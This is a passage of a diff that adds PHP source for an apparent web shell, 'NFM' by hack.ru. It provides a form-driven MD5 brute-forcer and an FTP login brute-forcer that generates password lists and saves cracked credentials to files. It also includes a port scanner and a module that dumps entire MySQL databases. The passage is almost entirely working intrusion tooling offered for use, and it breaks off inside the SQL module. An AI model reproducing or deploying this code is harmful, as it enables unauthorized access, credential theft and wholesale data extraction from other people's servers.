+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
